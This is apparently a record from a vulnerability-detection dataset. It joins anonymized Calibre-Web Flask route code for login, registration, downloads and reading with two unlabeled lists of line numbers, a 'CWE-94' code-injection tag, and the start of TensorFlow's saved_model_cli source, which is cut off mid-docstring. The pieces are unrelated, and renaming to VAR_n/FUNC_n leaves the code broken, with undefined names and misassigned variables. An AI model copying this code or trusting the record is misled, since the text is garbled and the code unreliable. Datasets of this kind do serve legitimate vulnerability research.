VAR_16 = get_cc_columns(filter_config_custom_read=True)
return FUNC_29(VAR_16)
@VAR_2.route("/cover/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_59(VAR_5):
return get_book_cover(VAR_5)
@VAR_2.route("/robots.txt")
def FUNC_60():
return send_from_directory(constants.STATIC_DIR, "robots.txt")
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_2
def FUNC_61(VAR_5, VAR_6, VAR_42):
VAR_6 = VAR_6.split(".")[0]
VAR_95 = calibre_db.get_book(VAR_5)
VAR_8 = calibre_db.get_book_format(VAR_5, VAR_6.upper())
if not VAR_8:
return "File not in Database"
VAR_3.info('Serving VAR_95: %s', VAR_8.name)
if config.config_use_google_drive:
try:
VAR_133 = Headers()
VAR_133["Content-Type"] = mimetypes.types_map.get('.' + VAR_6, "application/octet-stream")
VAR_134 = getFileFromEbooksFolder(VAR_95.path, VAR_8.name + "." + VAR_6)
return do_gdrive_download(VAR_134, VAR_133, (VAR_6.upper() == 'TXT'))
except AttributeError as ex:
VAR_3.debug_or_exception(ex)
return "File Not Found"
else:
if VAR_6.upper() == 'TXT':
try:
VAR_145 = open(os.path.join(config.config_calibre_dir, VAR_95.path, VAR_8.name + "." + VAR_6),
"rb").read()
VAR_135 = chardet.detect(VAR_145)
return make_response(
VAR_145.decode(VAR_135['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
except FileNotFoundError:
VAR_3.error("File Not Found")
return "File Not Found"
return send_from_directory(os.path.join(config.config_calibre_dir, VAR_95.path), VAR_8.name + "." + VAR_6)
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_1
def FUNC_62(VAR_5, VAR_6, VAR_42):
VAR_96 = "kobo" if "Kobo" in request.headers.get('User-Agent') else ""
return get_download_link(VAR_5, VAR_6, VAR_96)
@VAR_2.route('/send/<int:VAR_5>/<VAR_6>/<int:VAR_43>')
@login_required
@FUNC_1
def FUNC_63(VAR_5, VAR_6, VAR_43):
if not config.get_mail_server_configured():
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
elif VAR_87.kindle_mail:
VAR_135 = send_mail(VAR_5, VAR_6, VAR_43, VAR_87.kindle_mail, config.config_calibre_dir,
VAR_87.name)
if VAR_135 is None:
flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=VAR_87.kindle_mail),
category="success")
ub.update_download(VAR_5, int(VAR_87.id))
else:
flash(_(u"Oops! There was an VAR_139 sending this VAR_95: %(res)s", res=VAR_135), category="error")
else:
flash(_(u"Please update your FUNC_68 with a valid Send to Kindle E-mail Address."), category="error")
if "HTTP_REFERER" in request.environ:
return redirect(request.environ["HTTP_REFERER"])
else:
return redirect(url_for('web.index'))
@VAR_2.route('/register', methods=['GET', 'POST'])
def FUNC_64():
if not config.config_public_reg:
abort(404)
if VAR_87 is not None and VAR_87.is_authenticated:
return redirect(url_for('web.index'))
if not config.get_mail_server_configured():
flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
if request.method == "POST":
VAR_55 = request.form.to_dict()
VAR_115 = VAR_55["email"].strip() if config.config_register_email else VAR_55.get('name')
if not VAR_115 or not VAR_55.get("email"):
flash(_(u"Please fill out all fields!"), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
try:
VAR_115 = check_username(VAR_115)
VAR_136 = check_email(VAR_55["email"])
except Exception as ex:
flash(str(ex), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
VAR_116 = ub.User()
if check_valid_domain(VAR_136):
VAR_116.name = VAR_115
VAR_116.email = VAR_136
VAR_137 = generate_random_password()
VAR_116.password = generate_password_hash(VAR_137)
VAR_116.role = config.config_default_role
VAR_116.sidebar_view = config.config_default_show
try:
ub.session.add(VAR_116)
ub.session.commit()
if VAR_0['oauth']:
register_user_with_oauth(VAR_116)
send_registration_mail(VAR_55["email"].strip(), VAR_115, VAR_137)
except Exception:
ub.session.rollback()
flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
else:
flash(_(u"Your e-mail is not allowed to register"), category="error")
VAR_3.warning('Registering failed for VAR_104 "%s" e-mail address: %s', VAR_115, VAR_55["email"])
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
return redirect(url_for('web.login'))
if VAR_0['oauth']:
register_user_with_oauth()
return render_title_template('register.html', config=config, VAR_149=_("Register"), VAR_9="register")
@VAR_2.route('/login', methods=['GET', 'POST'])
def FUNC_65():
if VAR_87 is not None and VAR_87.is_authenticated:
return redirect(url_for('web.index'))
if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
VAR_3.error(u"Cannot activate LDAP authentication")
flash(_(u"Cannot activate LDAP authentication"), category="error")
if request.method == "POST":
VAR_117 = request.form.to_dict()
VAR_104 = ub.session.query(ub.User).filter(func.lower(ub.User.name) == VAR_117['username'].strip().lower()) \
.first()
if config.config_login_type == constants.LOGIN_LDAP and services.ldap and VAR_104 and VAR_117['password'] != "":
VAR_138, VAR_139 = services.ldap.bind_user(VAR_117['username'], VAR_117['password'])
if VAR_138:
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
flash(_(u"you are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name),
category="success")
return redirect_back(url_for("web.index"))
elif VAR_138 is None and VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) \
and VAR_104.name != "Guest":
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.info("Local Fallback Login as: '%s'", VAR_104.name)
flash(_(u"Fallback Login as: '%(VAR_115)s', LDAP Server not reachable, or VAR_104 not known",
VAR_115=VAR_104.name),
category="warning")
return redirect_back(url_for("web.index"))
elif VAR_138 is None:
VAR_3.info(VAR_139)
flash(_(u"Could not FUNC_65: %(message)s", message=VAR_139), category="error")
else:
VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
VAR_3.warning('LDAP Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
flash(_(u"Wrong Username or Password"), category="error")
else:
VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
if 'forgot' in VAR_117 and VAR_117['forgot'] == 'forgot':
if VAR_104 != None and VAR_104.name != "Guest":
VAR_147, VAR_64 = reset_password(VAR_104.id)
if VAR_147 == 1:
flash(_(u"New Password was send to your VAR_136 address"), category="info")
VAR_3.info('Password reset for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
else:
VAR_3.error(u"An unknown VAR_139 occurred. Please try again later")
flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
else:
flash(_(u"Please enter valid username to reset password"), category="error")
VAR_3.warning('Username missing for VAR_137 reset IP-address: %s', VAR_140)
else:
if VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) and VAR_104.name != "Guest":
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
flash(_(u"You are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name), category="success")
config.config_is_initial = False
return redirect_back(url_for("web.index"))
else:
VAR_3.warning('Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
flash(_(u"Wrong Username or Password"), category="error")
VAR_97 = request.args.get('next', default=url_for("web.index"), type=str)
if url_for("web.logout") == VAR_97:
next_url = url_for("web.index")
return render_title_template('login.html',
VAR_149=_(u"Login"),
VAR_97=next_url,
config=config,
VAR_100=oauth_check,
mail=config.get_mail_server_configured(), VAR_9="login")
@VAR_2.route('/logout')
@login_required
def FUNC_66():
if VAR_87 is not None and VAR_87.is_authenticated:
ub.delete_user_session(VAR_87.id, VAR_91.get('_id',""))
logout_user()
if VAR_0['oauth'] and (config.config_login_type == 2 or config.config_login_type == 3):
logout_oauth_user()
VAR_3.debug(u"User logged out")
return redirect(url_for('web.login'))
def FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48):
VAR_55 = request.form.to_dict()
VAR_87.random_books = 0
if VAR_87.role_passwd() or VAR_87.role_admin():
if VAR_55.get("password"):
VAR_87.password = generate_password_hash(VAR_55["password"])
try:
if VAR_55.get("kindle_mail", VAR_87.kindle_mail) != VAR_87.kindle_mail:
VAR_87.kindle_mail = valid_email(VAR_55["kindle_mail"])
if VAR_55.get("email", VAR_87.email) != VAR_87.email:
VAR_87.email = check_email(VAR_55["email"])
if VAR_87.role_admin():
if VAR_55.get("name", VAR_87.name) != VAR_87.name:
VAR_87.name = check_username(VAR_55["name"])
VAR_87.random_books = 1 if VAR_55.get("show_random") == "on" else 0
if VAR_55.get("default_language"):
VAR_87.default_language = VAR_55["default_language"]
if VAR_55.get("locale"):
VAR_87.locale = VAR_55["locale"]
VAR_87.kobo_only_shelves_sync = int(VAR_55.get("kobo_only_shelves_sync") == "on") or 0
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html",
VAR_116=VAR_87,
VAR_47=translations,
FUNC_68=1,
VAR_48=languages,
VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
VAR_9="me",
VAR_44=kobo_support,
registered_oauth=VAR_45,
VAR_46=oauth_status)
VAR_98 = 0
for key, VAR_64 in VAR_55.items():
if key.startswith('show'):
VAR_98 += int(key[5:])
VAR_87.sidebar_view = VAR_98
if VAR_55.get("Show_detail_random"):
VAR_87.sidebar_view += constants.DETAIL_RANDOM
try:
ub.session.commit()
flash(_(u"Profile updated"), category="success")
VAR_3.debug(u"Profile updated")
except IntegrityError:
ub.session.rollback()
flash(_(u"Found an existing account for this e-mail address"), category="error")
VAR_3.debug(u"Found an existing account for this e-mail address")
except OperationalError as e:
ub.session.rollback()
VAR_3.error("Database VAR_139: %s", e)
flash(_(u"Database VAR_139: %(error)s.", VAR_139=e), category="error")
@VAR_2.route("/me", methods=["GET", "POST"])
@login_required
def FUNC_68():
VAR_48 = calibre_db.speaking_language()
VAR_47 = babel.list_translations() + [LC('en')]
VAR_44 = VAR_0['kobo'] and config.config_kobo_sync
if VAR_0['oauth'] and config.config_login_type == 2:
VAR_46 = get_oauth_status()
VAR_45 = VAR_100
else:
VAR_46 = None
VAR_45 = {}
if request.method == "POST":
FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48)
return render_title_template("user_edit.html",
VAR_47=translations,
FUNC_68=1,
VAR_48=languages,
VAR_116=VAR_87,
VAR_44=kobo_support,
VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
VAR_9="me",
registered_oauth=VAR_45,
VAR_46=oauth_status)
@VAR_2.route("/read/<int:VAR_5>/<VAR_6>")
@login_required_if_no_ano
@FUNC_2
def FUNC_69(VAR_5, VAR_6):
VAR_95 = calibre_db.get_filtered_book(VAR_5)
if not VAR_95:
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
return redirect(url_for("web.index"))
FUNC_4 = None
if VAR_87.is_authenticated:
VAR_99 = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
ub.Bookmark.book_id == VAR_5,
ub.Bookmark.format == VAR_6.upper())).first()
if VAR_6.lower() == "epub":
VAR_3.debug(u"Start epub reader for %d", VAR_5)
return render_title_template('read.html', bookid=VAR_5, VAR_149=VAR_95.title, VAR_99=FUNC_4)
elif VAR_6.lower() == "pdf":
VAR_3.debug(u"Start pdf reader for %d", VAR_5)
return render_title_template('readpdf.html', pdffile=VAR_5, VAR_149=VAR_95.title)
elif VAR_6.lower() == "txt":
VAR_3.debug(u"Start txt reader for %d", VAR_5)
return render_title_template('readtxt.html', txtfile=VAR_5, VAR_149=VAR_95.title)
elif VAR_6.lower() == "djvu":
VAR_3.debug(u"Start djvu reader for %d", VAR_5)
return render_title_template('readdjvu.html', djvufile=VAR_5, VAR_149=VAR_95.title)
else:
for fileExt in constants.EXTENSIONS_AUDIO:
if VAR_6.lower() == fileExt:
VAR_63 = calibre_db.get_filtered_book(VAR_5)
VAR_3.debug(u"Start mp3 listening for %d", VAR_5)
return render_title_template('listenmp3.html', mp3file=VAR_5, audioformat=VAR_6.lower(),
entry=VAR_63, VAR_99=FUNC_4)
for fileExt in ["cbr", "cbt", "cbz"]:
if VAR_6.lower() == fileExt:
VAR_148 = str(VAR_5)
VAR_149 = VAR_95.title
if len(VAR_95.series):
VAR_149 = VAR_149 + " - " + VAR_95.series[0].name
if VAR_95.series_index:
VAR_149 = VAR_149 + " #" + '{0:.2f}'.format(VAR_95.series_index).rstrip('0').rstrip('.')
VAR_3.debug(u"Start comic reader for %d", VAR_5)
return render_title_template('readcbr.html', comicfile=VAR_148, VAR_149=title,
extension=fileExt)
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
@VAR_2.route("/VAR_95/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_70(VAR_5):
VAR_63 = calibre_db.get_filtered_book(VAR_5, allow_show_archived=True)
if VAR_63:
for FUNC_31 in range(0, len(VAR_63.languages)):
VAR_63.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), VAR_63.languages[
FUNC_31].lang_code)
VAR_16 = get_cc_columns(filter_config_custom_read=True)
VAR_118 = []
VAR_119 = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_5).all()
for entry in VAR_119:
VAR_118.append(entry.shelf)
if not VAR_87.is_anonymous:
if not config.config_read_column:
VAR_146 = ub.session.query(ub.ReadBook). \
filter(and_(ub.ReadBook.user_id == int(VAR_87.id), ub.ReadBook.book_id == VAR_5)).all()
VAR_142 = len(
VAR_146) > 0 and VAR_146[0].read_status == ub.ReadBook.STATUS_FINISHED
else:
try:
VAR_146 = getattr(VAR_63, 'custom_column_' + str(config.config_read_column))
VAR_142 = len(VAR_146) > 0 and VAR_146[0].value
except (KeyError, AttributeError):
VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
VAR_142 = None
VAR_54 = ub.session.query(ub.ArchivedBook).\
filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
ub.ArchivedBook.book_id == VAR_5)).first()
VAR_141 = VAR_54 and VAR_54.is_archived
else:
VAR_142 = None
VAR_141 = None
VAR_63.tags = VAR_7(VAR_63.tags, key=lambda tag: tag.name)
VAR_63 = calibre_db.order_authors(VAR_63)
VAR_120 = check_send_to_kindle(VAR_63)
VAR_121 = check_read_formats(VAR_63)
VAR_122 = []
for media_format in VAR_63.data:
if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
VAR_122.append(media_format.format.lower())
return render_title_template('detail.html',
entry=VAR_63,
VAR_122=audioentries,
VAR_16=cc,
is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
VAR_149=VAR_63.title,
books_shelfs=VAR_118,
VAR_142=have_read,
VAR_141=is_archived,
VAR_120=kindle_list,
VAR_121=reader_list,
VAR_9="book")
else:
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
43,
45,
48,
60,
66,
73,
78,
83,
84,
94,
96,
99,
100,
101,
102,
103,
110,
112,
113,
120,
122,
123,
124,
125,
131,
132,
143,
151,
152,
196,
211,
212,
225,
226,
246,
251,
264,
277,
278,
279,
280,
281,
286,
287,
292,
293,
298,
299,
304,
305,
318,
319,
344,
345,
373,
374,
421,
422,
432,
437,
438,
447,
473,
474,
486,
507,
508,
526,
532,
536,
537,
552,
553,
565,
566,
578,
579,
591,
592,
607,
608,
614,
615,
616,
617,
618,
619,
620,
621,
622,
629,
630,
668,
680,
681,
691,
693,
699,
704,
705,
707,
735,
736,
749,
750,
751,
752,
753,
760,
761,
769,
770,
777,
788,
812,
814,
826,
831,
832,
833,
834,
835,
836,
839,
843,
847,
848,
860,
861,
878,
879,
887,
907,
908,
929,
930,
957,
963,
964,
983,
984,
1004,
1005,
1013,
1015,
1016,
1017,
1018,
1019,
1023,
1024,
1025,
1026,
1035,
1036,
1057,
1058,
1059,
1060,
1061,
1065,
1069,
1070,
1075,
1076,
1077,
1078,
1091,
1092,
1103,
1104,
1132,
1133,
1143,
1144,
1153,
1154,
1181,
1182,
1189,
1190,
1197,
1198,
1205,
1212,
1263,
1266,
1267,
1271,
1277,
1278,
1284,
1300,
1324,
1325,
1356,
1359,
1360,
1366,
1384,
1385,
1386,
1390,
1393,
1394,
1395,
1396,
1397,
1402,
1406,
1439,
1440,
1448,
1449,
1471,
1472,
1473,
1474,
1475,
1485,
1498,
1523,
1527,
1528,
1531,
1532,
1533,
1593,
1603,
1604,
1615,
1616,
1617,
1631,
1639,
1652,
1660,
1673,
1674,
1687,
1700,
1701,
1702,
1703,
1704,
1714,
1715,
1754,
1755,
1764,
1765,
1766,
1767,
1768,
1769,
1775,
1789,
1794,
1798,
1800,
1802,
1805,
1810,
1828
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
43,
45,
48,
60,
66,
73,
78,
83,
84,
95,
98,
99,
100,
101,
102,
109,
111,
112,
119,
121,
122,
123,
124,
130,
131,
142,
150,
151,
195,
210,
211,
224,
225,
245,
250,
263,
276,
277,
278,
279,
280,
285,
286,
291,
292,
297,
298,
303,
304,
317,
318,
343,
344,
372,
373,
420,
421,
431,
436,
437,
446,
472,
473,
485,
506,
507,
525,
531,
535,
536,
551,
552,
564,
565,
577,
578,
590,
591,
606,
607,
613,
614,
615,
616,
617,
618,
619,
620,
621,
628,
629,
667,
679,
680,
690,
692,
698,
703,
704,
706,
734,
735,
748,
749,
750,
751,
752,
759,
760,
768,
769,
776,
787,
811,
813,
825,
830,
831,
832,
833,
834,
835,
838,
842,
846,
847,
859,
860,
877,
878,
886,
906,
907,
928,
929,
956,
962,
963,
982,
983,
1003,
1004,
1012,
1014,
1015,
1016,
1017,
1018,
1022,
1023,
1024,
1025,
1034,
1035,
1056,
1057,
1058,
1059,
1060,
1064,
1068,
1069,
1074,
1075,
1076,
1077,
1090,
1091,
1102,
1103,
1131,
1132,
1142,
1143,
1152,
1153,
1180,
1181,
1188,
1189,
1196,
1197,
1204,
1211,
1262,
1265,
1266,
1270,
1276,
1277,
1283,
1299,
1323,
1324,
1355,
1358,
1359,
1365,
1383,
1384,
1385,
1389,
1392,
1393,
1394,
1395,
1396,
1401,
1405,
1438,
1439,
1447,
1448,
1470,
1471,
1472,
1473,
1474,
1484,
1497,
1522,
1526,
1527,
1530,
1531,
1532,
1592,
1602,
1603,
1614,
1615,
1616,
1630,
1638,
1651,
1659,
1672,
1673,
1686,
1699,
1700,
1701,
1702,
1703,
1713,
1714,
1753,
1754,
1763,
1764,
1765,
1766,
1767,
1768,
1774,
1788,
1793,
1797,
1799,
1801,
1804,
1809,
1827
] |
5CWE-94
| # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Command-line interface to inspect and execute a graph in a SavedModel.
For detailed usages and examples, please refer to:
https://www.tensorflow.org/guide/saved_model#cli_to_inspect_and_execute_savedmodel
"""
import argparse
import os
import re
import sys
from absl import app # pylint: disable=unused-import
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.tools import saved_model_aot_compile
from tensorflow.python.tools import saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
_XLA_DEBUG_OPTIONS_URL = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
# Set of ops to denylist.
_OP_DENYLIST = set(['WriteFile', 'ReadFile', 'PrintV2'])
def _show_tag_sets(saved_model_dir):
"""Prints the tag-sets stored in SavedModel directory.
Prints all the tag-sets for MetaGraphs stored in SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
print('The given SavedModel contains the following tag-sets:')
for tag_set in sorted(tag_sets):
print('%r' % ', '.join(sorted(tag_set)))
def _show_signature_def_map_keys(saved_model_dir, tag_set):
"""Prints the keys for each SignatureDef in the SignatureDef map.
Prints the list of SignatureDef keys from the SignatureDef map specified by
the given tag-set and SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
tag_set: Group of tag(s) of the MetaGraphDef to get SignatureDef map from,
in string format, separated by ','. For tag-set contains multiple tags,
all tags must be passed in.
"""
signature_def_map = get_signature_def_map(saved_model_dir, tag_set)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for signature_def_key in sorted(signature_def_map.keys()):
print('SignatureDef key: \"%s\"' % signature_def_key)
def _get_inputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfo for all inputs of the SignatureDef.
Returns a dictionary that maps each input key to its TensorInfo for the given
signature_def_key in the meta_graph_def
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDef map to
look up SignatureDef key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps input tensor keys to TensorInfos.
Raises:
ValueError if `signature_def_key` is not found in the MetaGraphDef.
"""
if signature_def_key not in meta_graph_def.signature_def:
raise ValueError(
f'Could not find signature "{signature_def_key}". Please choose from: '
f'{", ".join(meta_graph_def.signature_def.keys())}')
return meta_graph_def.signature_def[signature_def_key].inputs
def _get_outputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfos for all outputs of the SignatureDef.
Returns a dictionary that maps each output key to its TensorInfo for the given
signature_def_key in the meta_graph_def.
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDefmap to
look up signature_def_key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps output tensor keys to TensorInfos.
"""
return meta_graph_def.signature_def[signature_def_key].outputs
def _show_inputs_outputs(saved_model_dir, tag_set, signature_def_key, indent=0):
"""Prints input and output TensorInfos.
Prints the details of input and output TensorInfos for the SignatureDef mapped
by the given signature_def_key.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
tag_set: Group of tag(s) of the MetaGraphDef, in string format, separated by
','. For tag-set contains multiple tags, all tags must be passed in.
signature_def_key: A SignatureDef key string.
indent: How far (in increments of 2 spaces) to indent each line of output.
"""
meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
tag_set)
inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
indent_str = ' ' * indent
def in_print(s):
print(indent_str + s)
in_print('The given SavedModel SignatureDef contains the following input(s):')
for input_key, input_tensor in sorted(inputs_tensor_info.items()):
in_print(' inputs[\'%s\'] tensor_info:' % input_key)
_print_tensor_info(input_tensor, indent+1)
in_print('The given SavedModel SignatureDef contains the following '
'output(s):')
for output_key, output_tensor in sorted(outputs_tensor_info.items()):
in_print(' outputs[\'%s\'] tensor_info:' % output_key)
_print_tensor_info(output_tensor, indent+1)
in_print('Method name is: %s' %
meta_graph_def.signature_def[signature_def_key].method_name)
def _show_defined_functions(saved_model_dir):
"""Prints the callable concrete and polymorphic functions of the Saved Model.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
meta_graphs = saved_model_utils.read_saved_model(saved_model_dir).meta_graphs
has_object_graph_def = False
for meta_graph_def in meta_graphs:
has_object_graph_def |= meta_graph_def.HasField('object_graph_def')
if not has_object_graph_def:
return
with ops_lib.Graph().as_default():
trackable_object = load.load(saved_model_dir)
print('\nDefined Functions:', end='')
functions = (
save._AugmentedGraphView(trackable_object) # pylint: disable=protected-access
.list_functions(trackable_object))
functions = sorted(functions.items(), key=lambda x: x[0])
for name, function in functions:
print('\n Function Name: \'%s\'' % name)
concrete_functions = []
if isinstance(function, defun.ConcreteFunction):
concrete_functions.append(function)
if isinstance(function, def_function.Function):
concrete_functions.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
concrete_functions = sorted(concrete_functions, key=lambda x: x.name)
for index, concrete_function in enumerate(concrete_functions, 1):
args, kwargs = None, None
if concrete_function.structured_input_signature:
args, kwargs = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
# For pure ConcreteFunctions we might have nothing better than
# _arg_keywords.
args = concrete_function._arg_keywords # pylint: disable=protected-access
if args:
print(' Option #%d' % index)
print(' Callable with:')
_print_args(args, indent=4)
if kwargs:
_print_args(kwargs, 'Named Argument', indent=4)
def _print_args(arguments, argument_type='Argument', indent=0):
"""Formats and prints the argument of the concrete functions defined in the model.
Args:
arguments: Arguments to format print.
argument_type: Type of arguments.
indent: How far (in increments of 2 spaces) to indent each line of
output.
"""
indent_str = ' ' * indent
def _maybe_add_quotes(value):
is_quotes = '\'' * isinstance(value, str)
return is_quotes + str(value) + is_quotes
def in_print(s, end='\n'):
print(indent_str + s, end=end)
for index, element in enumerate(arguments, 1):
if indent == 4:
in_print('%s #%d' % (argument_type, index))
if isinstance(element, six.string_types):
in_print(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((indent + 1) * ' ' + '%s: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: [', end='')
for value in element:
print('%s' % _maybe_add_quotes(value), end=', ')
print('\b\b]')
elif isinstance(element, dict):
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: {', end='')
for (key, value) in element.items():
print('\'%s\': %s' % (str(key), _maybe_add_quotes(value)), end=', ')
print('\b\b}')
else:
in_print(' DType: %s' % type(element).__name__)
in_print(' Value: %s' % str(element))
def _print_tensor_info(tensor_info, indent=0):
"""Prints details of the given tensor_info.
Args:
tensor_info: TensorInfo object to be printed.
indent: How far (in increments of 2 spaces) to indent each line output
"""
indent_str = ' ' * indent
def in_print(s):
print(indent_str + s)
in_print(' dtype: ' +
{value: key
for (key, value) in types_pb2.DataType.items()}[tensor_info.dtype])
# Display shape as tuple.
if tensor_info.tensor_shape.unknown_rank:
shape = 'unknown_rank'
else:
dims = [str(dim.size) for dim in tensor_info.tensor_shape.dim]
shape = ', '.join(dims)
shape = '(' + shape + ')'
in_print(' shape: ' + shape)
in_print(' name: ' + tensor_info.name)
def _show_all(saved_model_dir):
"""Prints tag-set, SignatureDef and Inputs/Outputs information in SavedModel.
Prints all tag-set, SignatureDef and Inputs/Outputs information stored in
SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
for tag_set in sorted(tag_sets):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(tag_set))
tag_set = ','.join(tag_set)
signature_def_map = get_signature_def_map(saved_model_dir, tag_set)
for signature_def_key in sorted(signature_def_map.keys()):
print('\nsignature_def[\'' + signature_def_key + '\']:')
_show_inputs_outputs(saved_model_dir, tag_set, signature_def_key,
indent=1)
_show_defined_functions(saved_model_dir)
def get_meta_graph_def(saved_model_dir, tag_set):
"""DEPRECATED: Use saved_model_utils.get_meta_graph_def instead.
Gets MetaGraphDef from SavedModel. Returns the MetaGraphDef for the given
tag-set and SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect or execute.
tag_set: Group of tag(s) of the MetaGraphDef to load, in string format,
separated by ','. For tag-set contains multiple tags, all tags must be
passed in.
Raises:
RuntimeError: An error when the given tag-set does not exist in the
SavedModel.
Returns:
A MetaGraphDef corresponding to the tag-set.
"""
return saved_model_utils.get_meta_graph_def(saved_model_dir, tag_set)
def get_signature_def_map(saved_model_dir, tag_set):
"""Gets SignatureDef map from a MetaGraphDef in a SavedModel.
Returns the SignatureDef map for the given tag-set in the SavedModel
directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect or execute.
